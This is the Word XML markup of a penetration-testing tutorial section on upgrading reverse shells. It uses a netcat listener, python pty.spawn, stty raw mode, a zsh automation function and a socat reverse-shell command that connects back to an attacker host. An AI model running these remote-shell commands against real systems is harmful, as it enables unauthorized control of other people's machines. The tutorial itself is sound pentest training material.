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.107925415039062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73f"/>
          <w:sz w:val="45.02091598510742"/>
          <w:szCs w:val="45.020915985107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73f"/>
          <w:sz w:val="45.02091598510742"/>
          <w:szCs w:val="45.02091598510742"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Upgrading shells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659912109375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="14.51927185058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73f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.765689849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73f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.765689849853516"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview 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841552734375" w:line="346.52687072753906" w:lineRule="auto"/>
        <w:ind w:left="20.93475341796875" w:right="87.44140625" w:hanging="2.4761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For the most part, when you initially gain your shell (for example, using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), it will be barely functional. If you press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CTRL ^C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, you will get disconnected. You will also find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arrow keys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don't work.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55029296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="24.6489715576171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73f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.765689849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73f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.765689849853516"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 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3.84765625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.78327941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Upgrading shells i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371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 just another thing Python is great at. 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5390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="20.93475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In the block below, I caught a standard netcat reverse shell on netcat.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60986328125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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┌──(kali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㉿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kali)-[~] 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826171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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└─$ nc -lvp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4444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70703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="133.036880493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listening on [any]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4444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70703125" w:line="319.87220764160156" w:lineRule="auto"/>
        <w:ind w:left="137.53890991210938" w:right="1765.8673095703125" w:hanging="6.302871704101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connect to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192.168.0.182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26a4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docker01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192.168.0.137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44178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$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7301025390625" w:line="346.52832984924316" w:lineRule="auto"/>
        <w:ind w:left="14.85687255859375" w:right="241.16455078125" w:firstLine="6.077880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If I try to use something like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sudo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, I'll get a message th</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="32373f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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 I don't have a TTY. I can resolve this using python. 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65869140625" w:line="319.8716640472412" w:lineRule="auto"/>
        <w:ind w:left="344.78515625" w:right="1261.6461181640625" w:firstLine="2.476119995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Note: This needs python to be installed on the target, not the Kali attacker receiving the reverse shell.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66113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Any of the commands below will work.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6104736328125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="117.5046539306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python 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84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26a4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pty; pty.spawn("/bin/bash")' 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70703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="117.5046539306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python2 -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84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26a4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pty; pty.spawn("/bin/bash")'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70703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="117.5046539306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python3 -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84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26a4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pty; pty.spawn("/bin/bash")' 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64495849609375" w:line="319.8717784881592" w:lineRule="auto"/>
        <w:ind w:left="14.85687255859375" w:right="269.034423828125" w:hanging="14.856872558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All I need to do is use it within my shell after receiving a connection as per below. Note that you must keep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on the end of the python command. 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2.7093505859375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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┌──(kali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㉿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kali)-[~]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700927734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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└─$ nc -lvp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4444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700927734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="133.036880493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listening on [any]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4444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700927734375" w:line="319.87192153930664" w:lineRule="auto"/>
        <w:ind w:left="137.53890991210938" w:right="1765.8673095703125" w:hanging="6.302871704101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connect to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192.168.0.182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26a4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docker01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192.168.0.137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48754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$ python -c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'import pty; pty.spawn("/bin/bash")'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555419921875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.45697021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8f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user@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docker01:~$  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6.5273857116699" w:lineRule="auto"/>
        <w:ind w:left="14.406661987304688" w:right="259.224853515625" w:firstLine="2.70126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Now that is done, it's much improved. You can use commands like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sudo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now and some exploits that need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TTY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will work. It's not perfect, as in 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command-completion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and no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CTRL ^C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, but we will look at enabling that in a moment.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47705078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="24.986572265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73f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.765689849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73f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.765689849853516"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat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84033203125" w:line="319.8713493347168" w:lineRule="auto"/>
        <w:ind w:left="7.428436279296875" w:right="198.62060546875" w:firstLine="9.67948913574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Netcat is likely the first type of shell you ever used while pen-testing. It's simple, and can be deployed on Windows and Linux alike. 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62451171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="16.4326477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Let's consider this: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574462890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="330.828628540039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You have spawned a shell and used Python to upgrade it to a psuedo TTY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608642578125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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┌──(kali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㉿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kali)-[~]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9482421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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└─$ nc -lvp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4444 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70703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="133.036880493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listening on [any]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4444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826171875" w:line="319.8724365234375" w:lineRule="auto"/>
        <w:ind w:left="137.53890991210938" w:right="1765.8673095703125" w:hanging="6.302871704101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connect to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192.168.0.182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26a4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docker01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192.168.0.137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42542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$ python -c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'import pty; pty.spawn("/bin/bash")' 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537109375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.45697021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8f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user@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docker01:~$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645263671875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0.6752777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You type out a command and realize you have a typo.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611083984375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.45697021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@docker01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8f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:~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cat /ettc/passwd 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645263671875" w:line="319.87112045288086" w:lineRule="auto"/>
        <w:ind w:left="6.9782257080078125" w:right="550.421142578125" w:firstLine="3.1514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So you try and use the arrow keys to move left and fix it, that does not work and you get an output similar to that below.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6971435546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.45697021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26a4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user@docker01:~$ cat /ettc/passwd^[[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26a4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^[[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26a4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^[[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26a4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^[[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26a4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^[[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26a4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^[[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26a4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645263671875" w:line="346.5277862548828" w:lineRule="auto"/>
        <w:ind w:left="4.0518951416015625" w:right="-19.19921875" w:firstLine="6.0778045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So, you you go ahead and press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CTRL^C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as that normally clears the line, but you end up disconnecting the shell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947021484375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.45697021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26a4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user@docker01:~$ cat /ettc/passwd^[[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26a4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^[[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26a4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^[[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26a4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^[[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26a4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^[[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26a4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^[[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26a4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^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26a4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6373291015625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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┌──(kali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㉿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kali)-[~]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713134765625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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└─$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6446533203125" w:line="319.8717784881592" w:lineRule="auto"/>
        <w:ind w:left="14.406661987304688" w:right="84.94384765625" w:firstLine="2.701263427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Now you need to go and and spawn the reverse shell and upgrade it with Python while thinking "There must be a better way". You could go with Socat, which will be covered later, but there are ways to upgrade the shell without it that do not require getting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socat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binary on the target.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0.14251708984375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="20.7771301269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73f"/>
          <w:sz w:val="29.263595581054688"/>
          <w:szCs w:val="29.26359558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73f"/>
          <w:sz w:val="29.263595581054688"/>
          <w:szCs w:val="29.263595581054688"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual mode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3035583496094" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="20.93475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I'll first look at how it is done manually. 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6.529016494751" w:lineRule="auto"/>
        <w:ind w:left="337.13157653808594" w:right="981.2506103515625" w:firstLine="3.826828002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Obtaining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auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Columns, Rows, and Terminal type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are all done within Kali, not the reverse shell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2.659912109375" w:line="346.52687072753906" w:lineRule="auto"/>
        <w:ind w:left="3.6016845703125" w:right="167.88330078125" w:hanging="2.9264068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You need to grab the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columns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of your current terminal session. This is essentially how big your current terminal window is. This can change if you resize it. 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.623291015625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0.6752777099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You can run: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7.60986328125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="135.287933349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ssty -a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2.64404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And you will see the output below.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.523193359375" w:line="231.4867401123047" w:lineRule="auto"/>
        <w:ind w:left="18.45855712890625" w:right="-12.073974609375" w:hanging="18.45848083496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  <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="6546717" cy="54317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6717" cy="5431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From this, you can see that my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51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and my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columns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are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235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.637939453125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="20.9347534179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If you want to get an easier to read output, try the command below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61474609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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184bb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┌──(kali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㉿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kali)-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84bb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[~]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713134765625" w:line="319.87220764160156" w:lineRule="auto"/>
        <w:ind w:left="131.2360382080078" w:right="280.645751953125" w:firstLine="40.74394226074219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└─$ echo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"Columns ="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$(stty -a &lt; /dev/tty | grep -oE 'columns [0-9]+' | cut -d' ' -f2) &amp;&amp; echo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"Rows ="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$(stty -a &lt; /dev/tty | grep -oE 'rows [0- 9]+' | cut -d' ' -f2)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7227783203125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="126.5087890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Columns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235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9482421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.2318267822265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Rows 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51 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637939453125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.10792541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Next, you need to get your current terminal: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618408203125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="126.7339324951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84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$TERM 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635498046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5.177383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This gives me the output below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6153564453125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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┌──(kali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㉿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kali)-[~]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700927734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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└─$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84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$TERM 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700927734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="123.58245849609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xterm-256color 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691650390625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.2552642822265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Compiling my terminal, columns, and rows into two commands, save them for shortly.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6153564453125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="135.287933349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stty rows 51 cols 235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88720703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="126.7339324951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=xterm-256color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13427734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.637878417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73f"/>
          <w:sz w:val="24.761505126953125"/>
          <w:szCs w:val="24.761505126953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73f"/>
          <w:sz w:val="24.761505126953125"/>
          <w:szCs w:val="24.761505126953125"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect your shell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3.782958984375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.9305419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Generate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reverse shell and have it connect back to your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Kali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box.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.979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┌──(kali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㉿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kali)-[~] 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826171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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└─$ nc -lvp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4444 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826171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="133.036880493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listening on [any]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4444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7314453125" w:line="319.8702621459961" w:lineRule="auto"/>
        <w:ind w:left="137.53890991210938" w:right="1765.8673095703125" w:hanging="6.302871704101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connect to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192.168.0.182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26a4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docker01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192.168.0.137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33352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$ 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720947265625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.78327941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Upgrade it with Python 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61962890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="117.5046539306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python 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84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26a4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pty; pty.spawn("/bin/bash")'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63427734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5.1773834228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This gives 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61962890625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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┌──(kali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㉿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kali)-[~]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826171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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└─$ nc -lvp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4444 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826171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="133.036880493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listening on [any]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4444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826171875" w:line="319.8746109008789" w:lineRule="auto"/>
        <w:ind w:left="137.53890991210938" w:right="1765.8673095703125" w:hanging="6.302871704101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connect to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192.168.0.182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26a4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docker01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192.168.0.137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33352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$ python -c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'import pty; pty.spawn("/bin/bash")'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518798828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.45697021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8f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user@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docker01:~$ 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635498046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.33306884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Press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Ctrl^Z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to background the shell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63427734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.45697021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user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@docker01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8f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:~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$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^Z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70703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="138.66447448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8f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zsh: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suspended nc -lvp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4444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70703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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70703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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┌──(kali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㉿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kali)-[~]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70703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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└─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$  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2.685546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.78327941894531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Use the command below to enable raw and then foreground the session. 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5732421875" w:line="626.4193725585938" w:lineRule="auto"/>
        <w:ind w:left="135.28793334960938" w:right="1777.298583984375" w:firstLine="195.5406951904297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You may need to press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auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enter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after the command below to have a prompt appear.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stty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84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raw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-echo &lt; /dev/tty; fg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.20355224609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17.107925415039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Now that is done, use the two commands we saved before.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6153564453125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="135.287933349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stty rows 51 cols 235 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88720703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="126.73393249511719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export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TERM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=xterm-256color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6397705078125" w:line="346.5274429321289" w:lineRule="auto"/>
        <w:ind w:left="57.58171081542969" w:right="210.791015625" w:hanging="52.404327392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That's it, you are done. Try it out!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top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ps aux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will now occupy the full screen. You can also use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Ctrl^C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as much as you like and it won't close your session.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.14862060546875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10.53489685058593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73f"/>
          <w:sz w:val="29.263595581054688"/>
          <w:szCs w:val="29.26359558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73f"/>
          <w:sz w:val="29.263595581054688"/>
          <w:szCs w:val="29.263595581054688"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scripted mode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46.52687072753906" w:lineRule="auto"/>
        <w:ind w:left="14.85687255859375" w:right="409.307861328125" w:firstLine="3.15147399902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Having that new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session is great, but it was a lot of work to get there. If only there was a way to have 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zsh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function (the default Kali shell) to automate it for us.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72119140625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="347.261276245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No shock to anyone, we can automate it!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2.5732421875" w:line="333.200740814209" w:lineRule="auto"/>
        <w:ind w:left="5.1773834228515625" w:right="155.41015625" w:hanging="9.22927856445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The shell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ZSH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has a file called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.zshrc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that lives in your home folder. This file lets you define things like aliases and functions. We are going to use a function to automate what we had to do for a manual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shell upgrade above. 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135498046875" w:line="346.52687072753906" w:lineRule="auto"/>
        <w:ind w:left="14.85687255859375" w:right="198.29833984375" w:hanging="2.92633056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Go ahead and edit your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~/.zshrc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with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nano ~/.zshrc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and insert the function below. I've added an image of where I inserted it, just above the aliases.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694091796875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="136.1883544921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function fg-bg() { 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826171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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26a4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[[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$#BUFFER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-eq 0 ]]; then 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7314453125" w:line="319.8702621459961" w:lineRule="auto"/>
        <w:ind w:left="112.55233764648438" w:right="414.536132812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a626a4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 local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backgroundProgram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$(jobs | tail -n 1 | awk '{print $4}')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" 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case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$backgroundProgram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26a4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in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54931640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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26a4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"nc"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"ncat"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"netcat"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826171875" w:line="319.87512588500977" w:lineRule="auto"/>
        <w:ind w:left="142.71636962890625" w:right="144.410400390625" w:hanging="30.16403198242187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 local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columns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=$(stty -a &lt; /dev/tty | grep -oE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'columns [0- 9]+'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| cut -d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-f2)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5126953125" w:line="319.87112045288086" w:lineRule="auto"/>
        <w:ind w:left="131.2360382080078" w:right="144.17724609375" w:hanging="18.68370056152343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 local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rows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=$(stty -a &lt; /dev/tty | grep -oE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'rows [0-9]+'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| cut -d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' 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-f2) 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604248046875" w:line="319.87112045288086" w:lineRule="auto"/>
        <w:ind w:left="137.53890991210938" w:right="415.006103515625" w:hanging="24.98657226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 notify-send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"Terminal dimensions" "Rows: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$rows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\nColumns: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$columns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\nstty command on clipboard"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555419921875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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echo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"stty rows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$rows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cols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$columns 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9482421875" w:line="319.8754692077637" w:lineRule="auto"/>
        <w:ind w:left="131.2360382080078" w:right="819.959716796875" w:hanging="18.683700561523438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export TERM=\"xterm-256color\""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| xclip -i -selection clipboard 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5126953125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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 stty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84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raw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-echo &lt; /dev/tty; fg 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9482421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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 ;;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9482421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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 *) 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74365234375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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 fg 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9482421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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 ;;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9482421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646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 esac 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917724609375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="112.552337646484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 fi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737548828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="156.897964477539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88720703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="138.6644744873047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zle -N fg-bg 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88720703125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="117.5046539306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bindkey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'^Z'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fg-bg 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9.91587162017822" w:lineRule="auto"/>
        <w:ind w:left="10.8050537109375" w:right="-12.073974609375" w:hanging="10.8049774169921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  <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="6546717" cy="3430594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46717" cy="34305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Once that is done, you can either log out / login again, or use: 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196533203125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="135.287933349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184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source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~/.zshrc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635498046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10.1296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So the file is read. Once that is done, connect a reverse shell and upgrade it with Python: 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615966796875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979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┌──(kali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㉿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kali)-[~] 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9482421875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="171.979980468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└─$ nc -lvp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4444 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79248046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="133.03688049316406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listening on [any]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4444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...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.469482421875" w:line="319.87112045288086" w:lineRule="auto"/>
        <w:ind w:left="137.53890991210938" w:right="1765.8673095703125" w:hanging="6.3028717041015625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connect to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192.168.0.182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626a4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docker01 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192.168.0.137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42542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$ python -c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'import pty; pty.spawn("/bin/bash")' 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5555419921875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="122.4569702148437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78f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user@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docker01:~$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635498046875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18.00834655761718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Here comes the automation. All you need to do is press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Ctrl ^ Z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twice, and then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enter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57373046875" w:line="346.5318775177002" w:lineRule="auto"/>
        <w:ind w:left="14.406661987304688" w:right="247.99560546875" w:hanging="3.60160827636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Once that is done, paste what is on your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clipboard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using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Ctrl + Shit + V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and press enter. That last paste from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clipboard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will resolve your terminal type,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rows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columns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66021728515625" w:line="346.5333080291748" w:lineRule="auto"/>
        <w:ind w:left="338.9324188232422" w:right="1553.6187744140625" w:hanging="8.7790679931640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At this stage you have a fully upgraded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auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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shell which only needed a handful of key combinations.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14556884765625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="12.155685424804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73f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.7656898498535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73f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.765689849853516"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Socat 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83880615234375" w:line="333.2013416290283" w:lineRule="auto"/>
        <w:ind w:left="4.0518951416015625" w:right="11.70654296875" w:firstLine="6.0778045654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Socat is the final method of terminal upgrade we are going to look at. It requires that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socat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be on both the target, and the attacker. You can download compiled binaries (for Linux and Windows) at the link below if you do not have it installed. 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.12054443359375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="14.85687255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55bda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5bda"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/andrew-d/static-binaries/tree/master/binaries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5bda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After that, there are only two steps.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054931640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="12.58331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73f"/>
          <w:sz w:val="29.263595581054688"/>
          <w:szCs w:val="29.26359558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73f"/>
          <w:sz w:val="29.263595581054688"/>
          <w:szCs w:val="29.263595581054688"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali 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1.298828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5.1773834228515625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The command below will listen on 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4444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62451171875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="135.28793334960938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socat file:`tty`,raw,echo=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0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tcp-listen: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4444 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0.133056640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="12.58331298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73f"/>
          <w:sz w:val="29.263595581054688"/>
          <w:szCs w:val="29.2635955810546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73f"/>
          <w:sz w:val="29.263595581054688"/>
          <w:szCs w:val="29.263595581054688"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On target 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.30859375" w:line="346.52252197265625" w:lineRule="auto"/>
        <w:ind w:left="16.432647705078125" w:right="58.880615234375" w:hanging="11.25526428222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The command below is run on the target. This example will connect back to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127.0.0.1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on port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4444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. Be sure to change the target IP. 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7.703857421875" w:line="646.4068794250488" w:lineRule="auto"/>
        <w:ind w:left="12.155685424804688" w:right="684.896240234375" w:firstLine="123.13224792480469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2373f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.76568984985351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socat exec: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a14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'bash -li'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,pty,stderr,setsid,sigint,sane tcp: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127.0.0.1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83a42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86801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4444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2373f"/>
          <w:sz w:val="33.765689849853516"/>
          <w:szCs w:val="33.765689849853516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.4501953125" w:line="346.53173446655273" w:lineRule="auto"/>
        <w:ind w:left="6.9782257080078125" w:right="257.1826171875" w:hanging="4.276962280273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We have covered upgrading to a TTY with Python, upgrading an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nc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session to be a essentially a full shell, and using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.25941276550293"/>
          <w:szCs w:val="20.25941276550293"/>
          <w:u w:val="none"/>
          <w:shd w:fill="cbcbcb" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat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73f"/>
          <w:sz w:val="22.51045799255371"/>
          <w:szCs w:val="22.51045799255371"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for a high quality shell which can be used on Linux and Windows.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="16820" w:w="11880" w:orient="portrait"/>
      <w:pgMar w:bottom="1161.396484375" w:top="579.998779296875" w:left="805.1045227050781" w:right="777.1789550781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